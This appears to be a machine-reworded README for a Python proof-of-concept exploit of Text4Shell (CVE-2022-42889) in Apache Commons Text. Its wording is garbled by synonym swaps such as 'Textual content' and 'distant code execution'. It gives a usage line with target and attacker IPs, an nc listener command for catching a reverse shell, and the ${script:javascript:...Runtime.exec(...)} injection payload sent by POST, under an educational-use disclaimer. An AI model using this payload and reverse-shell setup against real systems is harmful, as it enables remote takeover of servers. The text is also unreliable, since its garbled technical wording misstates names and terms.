A customized Python-based proof-of-concept (PoC) exploit concentrating on Text4Shell (CVE-2022-42889), a crucial distant code execution vulnerability in Apache Commons Textual content variations < 1.10. This exploit targets weak Java functions that use the StringSubstitutor class with interpolation enabled, permitting injection of ${script:...} expressions to execute arbitrary system instructions.
On this PoC, exploitation is demonstrated through the information question parameter; nevertheless, the weak parameter title might range relying on the implementation. Customers ought to adapt the payload and request path accordingly based mostly on the goal utility’s logic.
Disclaimer: This exploit is offered for academic and approved penetration testing functions solely. Use responsibly and at your personal danger.
Description
It is a customized Python3 exploit for the Apache Commons Textual content vulnerability referred to as Text4Shell (CVE-2022-42889). It permits Distant Code Execution (RCE) through insecure interpolators when person enter is dynamically evaluated by StringSubstitutor.
Examined towards: – Apache Commons Textual content < 1.10.0 – Java functions utilizing ${script:...} interpolation from untrusted enter
Utilization
python3 text4shell.py
Instance
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
Make sure that to arrange a lsitener in your attacking machine:
nc -nlvp 4444
Payload Logic
The script injects:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
The reverse shell is shipped through /information parameter utilizing a POST request.
